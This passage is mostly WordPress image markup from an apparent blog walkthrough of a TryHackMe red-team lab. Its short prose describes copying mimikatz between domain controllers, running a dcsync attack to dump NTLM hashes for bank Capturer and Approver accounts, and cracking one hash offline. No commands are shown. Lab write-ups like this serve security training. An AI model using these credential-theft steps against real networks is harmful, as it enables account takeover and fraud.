0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911fb29&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911fb29\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"403\" data-attachment-id=\"531\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210212722\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?fit=1488%2C585&amp;ssl=1\" data-orig-size=\"1488,585\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210212722\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?fit=1024%2C403&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=1024%2C403&#038;ssl=1\" alt=\"\" class=\"wp-image-531\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=1024%2C403&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?resize=768%2C302&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212722.png?w=1488&amp;ssl=1 1488w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We get further instructions in our email which states that we need to compromise a capturer&#8217;s and an approver&#8217;s account, log in with their accounts respectively, and complete the transaction. So to break it down further:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>We need a user account from <code>Capturers<\/code> group<\/li>\n\n\n\n<li>We need to log in with this account and capture the transaction<\/li>\n\n\n\n<li>We also need to get a user account from <code>Approvers<\/code> group<\/li>\n\n\n\n<li>We then need to log in as approver and complete the transaction to achieve the goal<\/li>\n<\/ul>\n\n\n\n<p>Let&#8217;s connect to BANKDC via RDP and enumerate the user groups.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091201d1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091201d1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"551\" data-attachment-id=\"532\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202643\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?fit=1332%2C717&amp;ssl=1\" data-orig-size=\"1332,717\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210202643\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?fit=1024%2C551&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=1024%2C551&#038;ssl=1\" alt=\"\" class=\"wp-image-532\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=1024%2C551&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?resize=768%2C413&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202643.png?w=1332&amp;ssl=1 1332w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We notice that there are two groups that we are interested in. We can check out the users in each group. We don&#8217;t need to compromise all the accounts&#8211;just one account from each group to complete the task.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09120779&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09120779\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"533\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202717\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?fit=1272%2C715&amp;ssl=1\" data-orig-size=\"1272,715\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210202717\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-533\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202717.png?w=1272&amp;ssl=1 1272w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09120c28&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09120c28\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"613\" data-attachment-id=\"534\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210202755\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?fit=1232%2C738&amp;ssl=1\" data-orig-size=\"1232,738\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210202755\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?fit=1024%2C613&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=1024%2C613&#038;ssl=1\" alt=\"\" class=\"wp-image-534\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=1024%2C613&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=300%2C180&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?resize=768%2C460&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210202755.png?w=1232&amp;ssl=1 1232w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can use <code>mimikatz<\/code> and perform <code>dcsync<\/code> attack to dump NTLM hashes for these users from both groups. We had the file on the ROOTDC machine.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09121111&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09121111\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"695\" data-attachment-id=\"535\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203044\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?fit=981%2C695&amp;ssl=1\" data-orig-size=\"981,695\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203044\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?fit=981%2C695&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=981%2C695&#038;ssl=1\" alt=\"\" class=\"wp-image-535\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?w=981&amp;ssl=1 981w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=300%2C213&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203044.png?resize=768%2C544&amp;ssl=1 768w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can download <code>mimikatz<\/code> from the ROOTDC machine to BANKDC.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091216bf&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091216bf\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"599\" data-attachment-id=\"536\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203557\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?fit=1330%2C778&amp;ssl=1\" data-orig-size=\"1330,778\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203557\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?fit=1024%2C599&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=1024%2C599&#038;ssl=1\" alt=\"\" class=\"wp-image-536\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=1024%2C599&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=300%2C175&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?resize=768%2C449&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203557.png?w=1330&amp;ssl=1 1330w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can grab the hashes for each user now.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09121dd4&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09121dd4\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"433\" data-attachment-id=\"537\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210203707\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?fit=1317%2C557&amp;ssl=1\" data-orig-size=\"1317,557\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210203707\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?fit=1024%2C433&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=1024%2C433&#038;ssl=1\" alt=\"\" class=\"wp-image-537\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=1024%2C433&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=300%2C127&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?resize=768%2C325&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210203707.png?w=1317&amp;ssl=1 1317w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We tried cracking the hash offline and we were successful.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091224f9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091224f9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"322\" data-attachment-id=\"538\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210215433\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?fit=878%2C322&amp;ssl=1\" data-orig-size=\"878,322\" data-comments-opened=\"1\" 